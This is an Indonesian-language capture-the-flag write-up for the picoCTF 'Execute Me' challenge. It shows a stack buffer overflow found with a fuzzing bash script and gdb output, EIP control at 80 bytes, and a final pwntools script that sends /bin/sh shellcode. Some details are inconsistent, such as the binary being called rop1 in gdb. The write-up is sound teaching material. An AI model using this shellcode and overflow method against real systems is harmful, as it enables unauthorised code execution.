[Pico CTF] Execute Me (80 Poin)
Masalah
Diberikan berkas execute
dan source code execute.c
. Eksploitasi binary dan temukan informasi rahasia!
Penyelesaian
Pengumpulan Informasi
Periksa jenis berkas dan keamanan binary terlebih dahulu.
$ file execute
execute: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=db3a216083ae03f55fc8640ce1145135b365356f, not stripped
$ checksec execute
[*] '/.../execute'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
Tidak proteksi apapun untuk binary ini.
Identifikasi Kelemahan
Cari jumlah buffer yang tepat untuk mendapatan pesan galat Segmentation Fault
. Gunakan script find_segfault_by_input.sh
.
#!/bin/bash
buffer=""
for i in {1..2048}
do
echo $i
buffer+="A"
echo $buffer > /tmp/delete.me
./$1 < /tmp/delete.me
if [ $? -eq 139 ]; then
echo "SEGMENTATION FAULT on $i BUFFER"
break
fi
done
~ skipped ~
71
72
Segmentation fault (core dumped) ./$1 < /tmp/delete.me
SEGMENTATION FAULT on 72 BUFFER
Mencari jumlah buffer yang tepat untuk mengendalikan register EIP, gunakan perintah dibawah ini.
$ gdb -q rop1
gdb$ r `perl -e 'print "A"x72'`
Luaran.
EIP: 0xf7df9599 --> 0x90000018
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
=> 0xf7df9599: sbb BYTE PTR [eax],al
0xf7df959b: add BYTE PTR [eax+0x4200074f],dl
0xf7df95a1: add BYTE PTR [eax],al
0xf7df95a3: add BYTE PTR [edx],bl
[------------------------------------stack-------------------------------------]
0000| 0xffffd308 --> 0x0
0004| 0xffffd30c --> 0x1
0008| 0xffffd310 --> 0xf7fe780b (<_dl_fixup+11>: add esi,0x157f5)
0012| 0xffffd314 --> 0x0
0016| 0xffffd318 --> 0xf7fa7000 --> 0x1b1db0
0020| 0xffffd31c --> 0xf7fa7000 --> 0x1b1db0
0024| 0xffffd320 --> 0xffffd398 --> 0xffffd300 --> 0x1
0028| 0xffffd324 --> 0xf7fee030 (<_dl_runtime_resolve+16>: pop edx)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xf7df9599 in ?? () from /lib/i386-linux-gnu/libc.so.6
Ternyata masih kurang, mari tambahkan 8 bytes kembali agar menjadi 80 bytes.
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xffffd3a0 --> 0xffffd600 ("rop/rop1")
0004| 0xffffd3a4 --> 0x804820c --> 0x33 ('3')
0008| 0xffffd3a8 --> 0x80484fb (<__libc_csu_init+11>: add ebx,0x1b05)
0012| 0xffffd3ac --> 0x0
0016| 0xffffd3b0 --> 0xf7fa7000 --> 0x1b1db0
0020| 0xffffd3b4 --> 0xf7fa7000 --> 0x1b1db0
0024| 0xffffd3b8 --> 0x0
0028| 0xffffd3bc --> 0xf7e0d637 (<__libc_start_main+247>: add esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()
Ternyata 4 bytes terakhir mengisi EIP.
Gadget
Gadget yang tepat bisa dicari sesuai dengan keadaan, misal:
EAX: 0xffffd350 ('A' <repeats 80 times>)
EBX: 0x0
ECX: 0xffffd650 ("AAAAAAAAA")
EDX: 0xffffd397 ("AAAAAAAAA")
ESI: 0xf7fa7000 --> 0x1b1db0
EDI: 0xf7fa7000 --> 0x1b1db0
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd3a0 --> 0xffffd600 ("rop/rop1")
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xffffd3a0 --> 0xffffd600 ("rop/rop1")
0004| 0xffffd3a4 --> 0x804820c --> 0x33 ('3')
0008| 0xffffd3a8 --> 0x80484fb (<__libc_csu_init+11>: add ebx,0x1b05)
0012| 0xffffd3ac --> 0x0
0016| 0xffffd3b0 --> 0xf7fa7000 --> 0x1b1db0
0020| 0xffffd3b4 --> 0xf7fa7000 --> 0x1b1db0
0024| 0xffffd3b8 --> 0x0
0028| 0xffffd3bc --> 0xf7e0d637 (<__libc_start_main+247>: add esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()
Karena buffer yang telah dimasukkan terkumpul dalam register EAX, maka gunakan gadget dibawah ini.
call eax
Disisi lain, buffer bisa digantikan dengan shellcode, instruksi NOP dan gadget sehingga ketika gadget dieksekusi maka shellcode pun tereksekusi.
Akhir
from pwn import *
shellcode = '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'
binary = process('./execute')
binary.send(shellcode)
binary.interactive()